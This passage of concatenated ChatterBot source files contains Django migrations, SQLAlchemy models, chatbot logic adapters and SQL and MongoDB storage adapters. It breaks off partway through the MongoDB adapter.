migrations.AddField( model_name='response', name='created_at', field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that this response was created at.' 
), ), ] File: chatterbot/ext/django_chatterbot/migrations/0008_update_conversations.py # Generated by Django 1.11 on 2017-07-18 11:25 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0007_response_created_at'), ] operations = [ migrations.RemoveField( model_name='conversation', name='statements', ), migrations.RemoveField( model_name='response', name='occurrence', ), migrations.RemoveField( model_name='statement', name='created_at', ), migrations.AddField( model_name='conversation', name='responses', field=models.ManyToManyField(help_text='The responses in this conversation.', related_name='conversations', to='django_chatterbot.Response'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0010_statement_text.py # Generated by Django 1.11.4 on 2017-08-16 00:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0009_tags'), ] operations = [ migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=400, unique=True), ), ] File: chatterbot/ext/django_chatterbot/migrations/0012_statement_created_at.py from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0011_blank_extra_data'), ] operations = [ migrations.AddField( model_name='statement', name='created_at', field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that the statement was created at.' ), ), ] File: chatterbot/ext/django_chatterbot/migrations/__init__.py File: chatterbot/ext/django_chatterbot/migrations/0005_statement_created_at.py # Generated by Django 1.10.1 on 2016-12-29 19:20 from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0004_rename_in_response_to'), ] operations = [ migrations.AddField( model_name='statement', name='created_at', field=models.DateTimeField( default=django.utils.timezone.now, help_text='The date and time that this statement was created at.' 
), ), ] File: chatterbot/ext/django_chatterbot/migrations/0006_create_conversation.py # Generated by Django 1.9 on 2017-01-17 07:02 from django.db import migrations, models import django.db.models.deletion import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0005_statement_created_at'), ] operations = [ migrations.CreateModel( name='Conversation', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ], ), migrations.AlterField( model_name='statement', name='created_at', field=models.DateTimeField(default=django.utils.timezone.now, help_text='The date and time that this statement was created at.'), ), migrations.AddField( model_name='conversation', name='statements', field=models.ManyToManyField(help_text='The statements in this conversation.', related_name='conversation', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0002_statement_extra_data.py # Generated by Django 1.10.2 on 2016-10-30 12:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0001_initial'), ] operations = [ migrations.AddField( model_name='statement', name='extra_data', field=models.CharField(default='{}', max_length=500), preserve_default=False, ), ] File: chatterbot/ext/django_chatterbot/migrations/0011_blank_extra_data.py # Generated by Django 1.11.4 on 2017-08-20 13:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0010_statement_text'), ] operations = [ migrations.AlterField( model_name='statement', name='extra_data', field=models.CharField(blank=True, max_length=500), ), ] File: chatterbot/ext/django_chatterbot/migrations/0009_tags.py # Generated by Django 1.11a1 on 2017-07-07 00:12 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0008_update_conversations'), ] operations = [ migrations.CreateModel( name='Tag', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.SlugField()), ], options={ 'abstract': False, }, ), migrations.AlterField( model_name='statement', name='text', field=models.CharField(max_length=255, unique=True), ), migrations.AddField( model_name='tag', name='statements', field=models.ManyToManyField(related_name='tags', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0014_remove_statement_extra_data.py from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0013_change_conversations'), ] operations = [ migrations.RemoveField( model_name='statement', name='extra_data', ), ] File: chatterbot/ext/django_chatterbot/migrations/0003_change_occurrence_default.py # Generated by Django 1.9 on 2016-12-12 00:06 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0002_statement_extra_data'), ] operations = [ migrations.AlterField( model_name='response', name='occurrence', field=models.PositiveIntegerField(default=1), ), ] File: chatterbot/ext/django_chatterbot/migrations/0001_initial.py from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [] operations = [ migrations.CreateModel( name='Response', fields=[ ('id', 
models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('occurrence', models.PositiveIntegerField(default=0)), ], ), migrations.CreateModel( name='Statement', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.CharField(max_length=255, unique=True)), ], ), migrations.AddField( model_name='response', name='response', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='+', to='django_chatterbot.Statement'), ), migrations.AddField( model_name='response', name='statement', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='in_response_to', to='django_chatterbot.Statement'), ), ] File: chatterbot/ext/django_chatterbot/migrations/0015_statement_persona.py from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('django_chatterbot', '0014_remove_statement_extra_data'), ] operations = [ migrations.AddField( model_name='statement', name='persona', field=models.CharField(default='', max_length=50), preserve_default=False, ), ] File: chatterbot/ext/sqlalchemy_app/models.py from sqlalchemy import Table, Column, Integer, String, DateTime, ForeignKey from sqlalchemy.orm import relationship from sqlalchemy.sql import func from sqlalchemy.ext.declarative import declared_attr, declarative_base from chatterbot.conversation import StatementMixin from chatterbot import constants class ModelBase(object): """ An augmented base class for SqlAlchemy models. """ @declared_attr def __tablename__(cls): """ Return the lowercase class name as the name of the table. """ return cls.__name__.lower() id = Column( Integer, primary_key=True, autoincrement=True ) Base = declarative_base(cls=ModelBase) tag_association_table = Table( 'tag_association', Base.metadata, Column('tag_id', Integer, ForeignKey('tag.id')), Column('statement_id', Integer, ForeignKey('statement.id')) ) class Tag(Base): """ A tag that describes a statement. """ name = Column( String(constants.TAG_NAME_MAX_LENGTH), unique=True ) class Statement(Base, StatementMixin): """ A Statement represents a sentence or phrase. """ confidence = 0 text = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH) ) search_text = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=False, server_default='' ) conversation = Column( String(constants.CONVERSATION_LABEL_MAX_LENGTH), nullable=False, server_default='' ) created_at = Column( DateTime(timezone=True), server_default=func.now() ) tags = relationship( 'Tag', secondary=lambda: tag_association_table, backref='statements' ) in_response_to = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=True ) search_in_response_to = Column( String(constants.STATEMENT_TEXT_MAX_LENGTH), nullable=False, server_default='' ) persona = Column( String(constants.PERSONA_MAX_LENGTH), nullable=False, server_default='' ) def get_tags(self): """ Return a list of tags for this statement. """ return [tag.name for tag in self.tags] def add_tags(self, *tags): """ Add a list of strings to the statement as tags. 
""" self.tags.extend([ Tag(name=tag) for tag in tags ]) File: chatterbot/ext/sqlalchemy_app/__init__.py File: chatterbot/logic/logic_adapter.py from chatterbot.adapters import Adapter from chatterbot.storage import StorageAdapter from chatterbot.search import IndexedTextSearch from chatterbot.conversation import Statement class LogicAdapter(Adapter): """ This is an abstract class that represents the interface that all logic adapters should implement. :param search_algorithm_name: The name of the search algorithm that should be used to search for close matches to the provided input. Defaults to the value of ``Search.name``. :param maximum_similarity_threshold: The maximum amount of similarity between two statement that is required before the search process is halted. The search for a matching statement will continue until a statement with a greater than or equal similarity is found or the search set is exhausted. Defaults to 0.95 :param response_selection_method: The a response selection method. Defaults to ``get_first_response`` :type response_selection_method: collections.abc.Callable :param default_response: The default response returned by this logic adaper if there is no other possible response to return. :type default_response: str or list or tuple """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) from chatterbot.response_selection import get_first_response self.search_algorithm_name = kwargs.get( 'search_algorithm_name', IndexedTextSearch.name ) self.search_algorithm = self.chatbot.search_algorithms[ self.search_algorithm_name ] self.maximum_similarity_threshold = kwargs.get( 'maximum_similarity_threshold', 0.95 ) # By default, select the first available response self.select_response = kwargs.get( 'response_selection_method', get_first_response ) default_responses = kwargs.get('default_response', []) # Convert a single string into a list if isinstance(default_responses, str): default_responses = [ default_responses ] self.default_responses = [ Statement(text=default) for default in default_responses ] def can_process(self, statement): """ A preliminary check that is called to determine if a logic adapter can process a given statement. By default, this method returns true but it can be overridden in child classes as needed. :rtype: bool """ return True def process(self, statement, additional_response_selection_parameters=None): """ Override this method and implement your logic for selecting a response to an input statement. A confidence value and the selected response statement should be returned. The confidence value represents a rating of how accurate the logic adapter expects the selected response to be. Confidence scores are used to select the best response from multiple logic adapters. The confidence value should be a number between 0 and 1 where 0 is the lowest confidence level and 1 is the highest. :param statement: An input statement to be processed by the logic adapter. :type statement: Statement :param additional_response_selection_parameters: Parameters to be used when filtering results to choose a response from. :type additional_response_selection_parameters: dict :rtype: Statement """ raise self.AdapterMethodNotImplementedError() def get_default_response(self, input_statement): """ This method is called when a logic adapter is unable to generate any other meaningful response. 
""" from random import choice if self.default_responses: response = choice(self.default_responses) else: try: response = self.chatbot.storage.get_random() except StorageAdapter.EmptyDatabaseException: response = input_statement self.chatbot.logger.info( 'No known response to the input was found. Selecting a random response.' ) # Set confidence to zero because a random response is selected response.confidence = 0 return response @property def class_name(self): """ Return the name of the current logic adapter class. This is typically used for logging and debugging. """ return str(self.__class__.__name__) File: chatterbot/logic/__init__.py from chatterbot.logic.logic_adapter import LogicAdapter from chatterbot.logic.best_match import BestMatch from chatterbot.logic.mathematical_evaluation import MathematicalEvaluation from chatterbot.logic.specific_response import SpecificResponseAdapter from chatterbot.logic.time_adapter import TimeLogicAdapter from chatterbot.logic.unit_conversion import UnitConversion __all__ = ( 'LogicAdapter', 'BestMatch', 'MathematicalEvaluation', 'SpecificResponseAdapter', 'TimeLogicAdapter', 'UnitConversion', ) File: chatterbot/logic/best_match.py from chatterbot.logic import LogicAdapter from chatterbot import filters class BestMatch(LogicAdapter): """ A logic adapter that returns a response based on known responses to the closest matches to the input statement. :param excluded_words: The excluded_words parameter allows a list of words to be set that will prevent the logic adapter from returning statements that have text containing any of those words. This can be useful for preventing your chat bot from saying swears when it is being demonstrated in front of an audience. Defaults to None :type excluded_words: list """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) self.excluded_words = kwargs.get('excluded_words') def process(self, input_statement, additional_response_selection_parameters=None): search_results = self.search_algorithm.search(input_statement) # Use the input statement as the closest match if no other results are found closest_match = next(search_results, input_statement) # Search for the closest match to the input statement for result in search_results: closest_match = result # Stop searching if a match that is close enough is found if result.confidence >= self.maximum_similarity_threshold: break self.chatbot.logger.info('Using "{}" as a close match to "{}" with a confidence of {}'.format( closest_match.text, input_statement.text, closest_match.confidence )) recent_repeated_responses = filters.get_recent_repeated_responses( self.chatbot, input_statement.conversation ) for index, recent_repeated_response in enumerate(recent_repeated_responses): self.chatbot.logger.info('{}. 
Excluding recent repeated response of "{}"'.format( index, recent_repeated_response )) response_selection_parameters = { 'search_in_response_to': closest_match.search_text, 'exclude_text': recent_repeated_responses, 'exclude_text_words': self.excluded_words } alternate_response_selection_parameters = { 'search_in_response_to': self.chatbot.storage.tagger.get_text_index_string( input_statement.text ), 'exclude_text': recent_repeated_responses, 'exclude_text_words': self.excluded_words } if additional_response_selection_parameters: response_selection_parameters.update(additional_response_selection_parameters) alternate_response_selection_parameters.update(additional_response_selection_parameters) # Get all statements that are in response to the closest match response_list = list(self.chatbot.storage.filter(**response_selection_parameters)) alternate_response_list = [] if not response_list: self.chatbot.logger.info('No responses found. Generating alternate response list.') alternate_response_list = list(self.chatbot.storage.filter(**alternate_response_selection_parameters)) if response_list: self.chatbot.logger.info( 'Selecting response from {} optimal responses.'.format( len(response_list) ) ) response = self.select_response( input_statement, response_list, self.chatbot.storage ) response.confidence = closest_match.confidence self.chatbot.logger.info('Response selected. Using "{}"'.format(response.text)) elif alternate_response_list: ''' The case where there was no responses returned for the selected match but a value exists for the statement the match is in response to. ''' self.chatbot.logger.info( 'Selecting response from {} optimal alternate responses.'.format( len(alternate_response_list) ) ) response = self.select_response( input_statement, alternate_response_list, self.chatbot.storage ) response.confidence = closest_match.confidence self.chatbot.logger.info('Alternate response selected. Using "{}"'.format(response.text)) else: response = self.get_default_response(input_statement) return response File: chatterbot/logic/mathematical_evaluation.py from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot import languages class MathematicalEvaluation(LogicAdapter): """ The MathematicalEvaluation logic adapter parses input to determine whether the user is asking a question that requires math to be done. If so, the equation is extracted from the input and returned with the evaluated result. For example: User: 'What is three plus five?' Bot: 'Three plus five equals eight' :kwargs: * *language* (``object``) -- The language is set to ``chatterbot.languages.ENG`` for English by default. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) self.language = kwargs.get('language', languages.ENG) self.cache = {} def can_process(self, statement): """ Determines whether it is appropriate for this adapter to respond to the user input. """ response = self.process(statement) self.cache[statement.text] = response return response.confidence == 1 def process(self, statement, additional_response_selection_parameters=None): """ Takes a statement string. Returns the equation from the statement with the mathematical terms solved. 
""" from mathparse import mathparse input_text = statement.text # Use the result cached by the process method if it exists if input_text in self.cache: cached_result = self.cache[input_text] self.cache = {} return cached_result # Getting the mathematical terms within the input statement expression = mathparse.extract_expression(input_text, language=self.language.ISO_639.upper()) response = Statement(text=expression) try: response.text = '{} = {}'.format( response.text, mathparse.parse(expression, language=self.language.ISO_639.upper()) ) # The confidence is 1 if the expression could be evaluated response.confidence = 1 except mathparse.PostfixTokenEvaluationException: response.confidence = 0 return response File: chatterbot/logic/unit_conversion.py from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot.exceptions import OptionalDependencyImportError from chatterbot import languages from chatterbot import parsing from mathparse import mathparse import re class UnitConversion(LogicAdapter): """ The UnitConversion logic adapter parse inputs to convert values between several metric units. For example: User: 'How many meters are in one kilometer?' Bot: '1000.0' :kwargs: * *language* (``object``) -- The language is set to ``chatterbot.languages.ENG`` for English by default. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) try: from pint import UnitRegistry except ImportError: message = ( 'Unable to import "pint".\n' 'Please install "pint" before using the UnitConversion logic adapter:\n' 'pip3 install pint' ) raise OptionalDependencyImportError(message) self.language = kwargs.get('language', languages.ENG) self.cache = {} self.patterns = [ ( re.compile(r''' (([Hh]ow\s+many)\s+ (?P<target>\S+)\s+ # meter, celsius, hours ((are)*\s*in)\s+ (?P<number>([+-]?\d+(?:\.\d+)?)|(a|an)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ), ( re.compile(r''' ((?P<number>([+-]?\d+(?:\.\d+)?)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s+ # meter, celsius, hours (to)\s+ (?P<target>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ), ( re.compile(r''' ((?P<number>([+-]?\d+(?:\.\d+)?)|(a|an)|(%s[-\s]?)+)\s+ (?P<from>\S+)\s+ # meter, celsius, hours (is|are)\s+ (how\s+many)*\s+ (?P<target>\S+)\s*) # meter, celsius, hours ''' % (parsing.numbers), (re.VERBOSE | re.IGNORECASE) ), lambda m: self.handle_matches(m) ) ] self.unit_registry = UnitRegistry() def get_unit(self, unit_variations): """ Get the first match unit metric object supported by pint library given a variation of unit metric names (Ex:['HOUR', 'hour']). :param unit_variations: A list of strings with names of units :type unit_variations: str """ for unit in unit_variations: try: return getattr(self.unit_registry, unit) except Exception: continue return None def get_valid_units(self, from_unit, target_unit): """ Returns the first match `pint.unit.Unit` object for from_unit and target_unit strings from a possible variation of metric unit names supported by pint library. 
:param from_unit: source metric unit :type from_unit: str :param from_unit: target metric unit :type from_unit: str """ from_unit_variations = [from_unit.lower(), from_unit.upper()] target_unit_variations = [target_unit.lower(), target_unit.upper()] from_unit = self.get_unit(from_unit_variations) target_unit = self.get_unit(target_unit_variations) return from_unit, target_unit def handle_matches(self, match): """ Returns a response statement from a matched input statement. :param match: It is a valid matched pattern from the input statement :type: `_sre.SRE_Match` """ response = Statement(text='') from_parsed = match.group("from") target_parsed = match.group("target") n_statement = match.group("number") if n_statement == 'a' or n_statement == 'an': n_statement = '1.0' n = mathparse.parse(n_statement, self.language.ISO_639.upper()) from_parsed, target_parsed = self.get_valid_units(from_parsed, target_parsed) if from_parsed is None or target_parsed is None: response.confidence = 0.0 else: from_value = self.unit_registry.Quantity(float(n), from_parsed) target_value = from_value.to(target_parsed) response.confidence = 1.0 response.text = str(target_value.magnitude) return response def can_process(self, statement): response = self.process(statement) self.cache[statement.text] = response return response.confidence == 1.0 def process(self, statement, additional_response_selection_parameters=None): response = Statement(text='') input_text = statement.text try: # Use the result cached by the process method if it exists if input_text in self.cache: response = self.cache[input_text] self.cache = {} return response for pattern, func in self.patterns: p = pattern.match(input_text) if p is not None: response = func(p) if response.confidence == 1.0: break except Exception: response.confidence = 0.0 finally: return response File: chatterbot/logic/specific_response.py from chatterbot.logic import LogicAdapter class SpecificResponseAdapter(LogicAdapter): """ Return a specific response to a specific input. :kwargs: * *input_text* (``str``) -- The input text that triggers this logic adapter. * *output_text* (``str``) -- The output text returned by this logic adapter. """ def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) from chatterbot.conversation import Statement self.input_text = kwargs.get('input_text') output_text = kwargs.get('output_text') self.response_statement = Statement(text=output_text) def can_process(self, statement): if statement.text == self.input_text: return True return False def process(self, statement, additional_response_selection_parameters=None): if statement.text == self.input_text: self.response_statement.confidence = 1 else: self.response_statement.confidence = 0 return self.response_statement File: chatterbot/logic/time_adapter.py from datetime import datetime from chatterbot.logic import LogicAdapter from chatterbot.conversation import Statement from chatterbot.exceptions import OptionalDependencyImportError class TimeLogicAdapter(LogicAdapter): """ The TimeLogicAdapter returns the current time. :kwargs: * *positive* (``list``) -- The time-related questions used to identify time questions. Defaults to a list of English sentences. * *negative* (``list``) -- The non-time-related questions used to identify time questions. Defaults to a list of English sentences. 
""" def __init__(self, chatbot, **kwargs): super().__init__(chatbot, **kwargs) try: from nltk import NaiveBayesClassifier except ImportError: message = ( 'Unable to import "nltk".\n' 'Please install "nltk" before using the TimeLogicAdapter:\n' 'pip3 install nltk' ) raise OptionalDependencyImportError(message) self.positive = kwargs.get('positive', [ 'what time is it', 'hey what time is it', 'do you have the time', 'do you know the time', 'do you know what time it is', 'what is the time' ]) self.negative = kwargs.get('negative', [ 'it is time to go to sleep', 'what is your favorite color', 'i had a great time', 'thyme is my favorite herb', 'do you have time to look at my essay', 'how do you have the time to do all this' 'what is it' ]) labeled_data = ( [ (name, 0) for name in self.negative ] + [ (name, 1) for name in self.positive ] ) train_set = [ (self.time_question_features(text), n) for (text, n) in labeled_data ] self.classifier = NaiveBayesClassifier.train(train_set) def time_question_features(self, text): """ Provide an analysis of significant features in the string. """ features = {} # A list of all words from the known sentences all_words = " ".join(self.positive + self.negative).split() # A list of the first word in each of the known sentence all_first_words = [] for sentence in self.positive + self.negative: all_first_words.append( sentence.split(' ', 1)[0] ) for word in text.split(): features['first_word({})'.format(word)] = (word in all_first_words) for word in text.split(): features['contains({})'.format(word)] = (word in all_words) for letter in 'abcdefghijklmnopqrstuvwxyz': features['count({})'.format(letter)] = text.lower().count(letter) features['has({})'.format(letter)] = (letter in text.lower()) return features def process(self, statement, additional_response_selection_parameters=None): now = datetime.now() time_features = self.time_question_features(statement.text.lower()) confidence = self.classifier.classify(time_features) response = Statement(text='The current time is ' + now.strftime('%I:%M %p')) response.confidence = confidence return response File: chatterbot/storage/sql_storage.py from chatterbot.storage import StorageAdapter class SQLStorageAdapter(StorageAdapter): """ The SQLStorageAdapter allows ChatterBot to store conversation data in any database supported by the SQL Alchemy ORM. All parameters are optional, by default a sqlite database is used. It will check if tables are present, if they are not, it will attempt to create the required tables. :keyword database_uri: eg: sqlite:///database_test.sqlite3', The database_uri can be specified to choose database driver. 
:type database_uri: str """ def __init__(self, **kwargs): super().__init__(**kwargs) from sqlalchemy import create_engine from sqlalchemy.orm import sessionmaker self.database_uri = kwargs.get('database_uri', False) # None results in a sqlite in-memory database as the default if self.database_uri is None: self.database_uri = 'sqlite://' # Create a file database if the database is not a connection string if not self.database_uri: self.database_uri = 'sqlite:///db.sqlite3' self.engine = create_engine(self.database_uri, convert_unicode=True) if self.database_uri.startswith('sqlite://'): from sqlalchemy.engine import Engine from sqlalchemy import event @event.listens_for(Engine, 'connect') def set_sqlite_pragma(dbapi_connection, connection_record): dbapi_connection.execute('PRAGMA journal_mode=WAL') dbapi_connection.execute('PRAGMA synchronous=NORMAL') if not self.engine.dialect.has_table(self.engine, 'Statement'): self.create_database() self.Session = sessionmaker(bind=self.engine, expire_on_commit=True) def get_statement_model(self): """ Return the statement model. """ from chatterbot.ext.sqlalchemy_app.models import Statement return Statement def get_tag_model(self): """ Return the conversation model. """ from chatterbot.ext.sqlalchemy_app.models import Tag return Tag def model_to_object(self, statement): from chatterbot.conversation import Statement as StatementObject return StatementObject(**statement.serialize()) def count(self): """ Return the number of entries in the database. """ Statement = self.get_model('statement') session = self.Session() statement_count = session.query(Statement).count() session.close() return statement_count def remove(self, statement_text): """ Removes the statement that matches the input text. Removes any responses from statements where the response text matches the input text. """ Statement = self.get_model('statement') session = self.Session() query = session.query(Statement).filter_by(text=statement_text) record = query.first() session.delete(record) self._session_finish(session) def filter(self, **kwargs): """ Returns a list of objects from the database. The kwargs parameter can contain any number of attributes. Only objects which contain all listed attributes and in which all values match for all listed attributes will be returned. 
""" from sqlalchemy import or_ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() page_size = kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) # Convert a single sting into a list if only one tag is provided if type(tags) == str: tags = [tags] if len(kwargs) == 0: statements = session.query(Statement).filter() else: statements = session.query(Statement).filter_by(**kwargs) if tags: statements = statements.join(Statement.tags).filter( Tag.name.in_(tags) ) if exclude_text: statements = statements.filter( ~Statement.text.in_(exclude_text) ) if exclude_text_words: or_word_query = [ Statement.text.ilike('%' + word + '%') for word in exclude_text_words ] statements = statements.filter( ~or_(*or_word_query) ) if persona_not_startswith: statements = statements.filter( ~Statement.persona.startswith('bot:') ) if search_text_contains: or_query = [ Statement.search_text.contains(word) for word in search_text_contains.split(' ') ] statements = statements.filter( or_(*or_query) ) if order_by: if 'created_at' in order_by: index = order_by.index('created_at') order_by[index] = Statement.created_at.asc() statements = statements.order_by(*order_by) total_statements = statements.count() for start_index in range(0, total_statements, page_size): for statement in statements.slice(start_index, start_index + page_size): yield self.model_to_object(statement) session.close() def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() tags = set(kwargs.pop('tags', [])) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: in_response_to = kwargs.get('in_response_to') if in_response_to: kwargs['search_in_response_to'] = self.tagger.get_text_index_string(in_response_to) statement = Statement(**kwargs) for tag_name in tags: tag = session.query(Tag).filter_by(name=tag_name).first() if not tag: # Create the tag tag = Tag(name=tag_name) statement.tags.append(tag) session.add(statement) session.flush() session.refresh(statement) statement_object = self.model_to_object(statement) self._session_finish(session) return statement_object def create_many(self, statements): """ Creates multiple statement entries. 
""" Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() create_statements = [] create_tags = {} for statement in statements: statement_data = statement.serialize() tag_data = statement_data.pop('tags', []) statement_model_object = Statement(**statement_data) if not statement.search_text: statement_model_object.search_text = self.tagger.get_text_index_string(statement.text) if not statement.search_in_response_to and statement.in_response_to: statement_model_object.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) new_tags = set(tag_data) - set(create_tags.keys()) if new_tags: existing_tags = session.query(Tag).filter( Tag.name.in_(new_tags) ) for existing_tag in existing_tags: create_tags[existing_tag.name] = existing_tag for tag_name in tag_data: if tag_name in create_tags: tag = create_tags[tag_name] else: # Create the tag if it does not exist tag = Tag(name=tag_name) create_tags[tag_name] = tag statement_model_object.tags.append(tag) create_statements.append(statement_model_object) session.add_all(create_statements) session.commit() def update(self, statement): """ Modifies an entry in the database. Creates an entry if one does not exist. """ Statement = self.get_model('statement') Tag = self.get_model('tag') if statement is not None: session = self.Session() record = None if hasattr(statement, 'id') and statement.id is not None: record = session.query(Statement).get(statement.id) else: record = session.query(Statement).filter( Statement.text == statement.text, Statement.conversation == statement.conversation, ).first() # Create a new statement entry if one does not already exist if not record: record = Statement( text=statement.text, conversation=statement.conversation, persona=statement.persona ) # Update the response value record.in_response_to = statement.in_response_to record.created_at = statement.created_at record.search_text = self.tagger.get_text_index_string(statement.text) if statement.in_response_to: record.search_in_response_to = self.tagger.get_text_index_string(statement.in_response_to) for tag_name in statement.get_tags(): tag = session.query(Tag).filter_by(name=tag_name).first() if not tag: # Create the record tag = Tag(name=tag_name) record.tags.append(tag) session.add(record) self._session_finish(session) def get_random(self): """ Returns a random statement from the database. """ import random Statement = self.get_model('statement') session = self.Session() count = self.count() if count < 1: raise self.EmptyDatabaseException() random_index = random.randrange(0, count) random_statement = session.query(Statement)[random_index] statement = self.model_to_object(random_statement) session.close() return statement def drop(self): """ Drop the database. """ Statement = self.get_model('statement') Tag = self.get_model('tag') session = self.Session() session.query(Statement).delete() session.query(Tag).delete() session.commit() session.close() def create_database(self): """ Populate the database with the tables. 
""" from chatterbot.ext.sqlalchemy_app.models import Base Base.metadata.create_all(self.engine) def _session_finish(self, session, statement_text=None): from sqlalchemy.exc import InvalidRequestError try: session.commit() except InvalidRequestError: # Log the statement text and the exception self.logger.exception(statement_text) finally: session.close() File: chatterbot/storage/mongodb.py import re from chatterbot.storage import StorageAdapter class MongoDatabaseAdapter(StorageAdapter): """ The MongoDatabaseAdapter is an interface that allows ChatterBot to store statements in a MongoDB database. :keyword database_uri: The URI of a remote instance of MongoDB. This can be any valid `MongoDB connection string <https://docs.mongodb.com/manual/reference/connection-string/>`_ :type database_uri: str .. code-block:: python database_uri='mongodb://example.com:8100/' """ def __init__(self, **kwargs): super().__init__(**kwargs) from pymongo import MongoClient from pymongo.errors import OperationFailure self.database_uri = kwargs.get( 'database_uri', 'mongodb://localhost:27017/chatterbot-database' ) # Use the default host and port self.client = MongoClient(self.database_uri) # Increase the sort buffer to 42M if possible try: self.client.admin.command({'setParameter': 1, 'internalQueryExecMaxBlockingSortBytes': 44040192}) except OperationFailure: pass # Specify the name of the database self.database = self.client.get_database() # The mongo collection of statement documents self.statements = self.database['statements'] def get_statement_model(self): """ Return the class for the statement model. """ from chatterbot.conversation import Statement # Create a storage-aware statement statement = Statement statement.storage = self return statement def count(self): return self.statements.count() def mongo_to_object(self, statement_data): """ Return Statement object when given data returned from Mongo DB. """ Statement = self.get_model('statement') statement_data['id'] = statement_data['_id'] return Statement(**statement_data) def filter(self, **kwargs): """ Returns a list of statements in the database that match the parameters specified. 
""" import pymongo page_size = kwargs.pop('page_size', 1000) order_by = kwargs.pop('order_by', None) tags = kwargs.pop('tags', []) exclude_text = kwargs.pop('exclude_text', None) exclude_text_words = kwargs.pop('exclude_text_words', []) persona_not_startswith = kwargs.pop('persona_not_startswith', None) search_text_contains = kwargs.pop('search_text_contains', None) if tags: kwargs['tags'] = { '$in': tags } if exclude_text: if 'text' not in kwargs: kwargs['text'] = {} elif 'text' in kwargs and isinstance(kwargs['text'], str): text = kwargs.pop('text') kwargs['text'] = { '$eq': text } kwargs['text']['$nin'] = exclude_text if exclude_text_words: if 'text' not in kwargs: kwargs['text'] = {} elif 'text' in kwargs and isinstance(kwargs['text'], str): text = kwargs.pop('text') kwargs['text'] = { '$eq': text } exclude_word_regex = '|'.join([ '.*{}.*'.format(word) for word in exclude_text_words ]) kwargs['text']['$not'] = re.compile(exclude_word_regex) if persona_not_startswith: if 'persona' not in kwargs: kwargs['persona'] = {} elif 'persona' in kwargs and isinstance(kwargs['persona'], str): persona = kwargs.pop('persona') kwargs['persona'] = { '$eq': persona } kwargs['persona']['$not'] = re.compile('^bot:*') if search_text_contains: or_regex = '|'.join([ '{}'.format(re.escape(word)) for word in search_text_contains.split(' ') ]) kwargs['search_text'] = re.compile(or_regex) mongo_ordering = [] if order_by: # Sort so that newer datetimes appear first if 'created_at' in order_by: order_by.remove('created_at') mongo_ordering.append(('created_at', pymongo.DESCENDING, )) for order in order_by: mongo_ordering.append((order, pymongo.ASCENDING)) total_statements = self.statements.find(kwargs).count() for start_index in range(0, total_statements, page_size): if mongo_ordering: for match in self.statements.find(kwargs).sort(mongo_ordering).skip(start_index).limit(page_size): yield self.mongo_to_object(match) else: for match in self.statements.find(kwargs).skip(start_index).limit(page_size): yield self.mongo_to_object(match) def create(self, **kwargs): """ Creates a new statement matching the keyword arguments specified. Returns the created statement. """ Statement = self.get_model('statement') if 'tags' in kwargs: kwargs['tags'] = list(set(kwargs['tags'])) if 'search_text' not in kwargs: kwargs['search_text'] = self.tagger.get_text_index_string(kwargs['text']) if 'search_in_response_to' not in kwargs: if kwargs.get('in_response_to'): kwargs['search_in_response_to'] = self.tagger.get_text_index_string(kwargs['in_response_to']) inserted = self.statements.insert_one(kwargs) 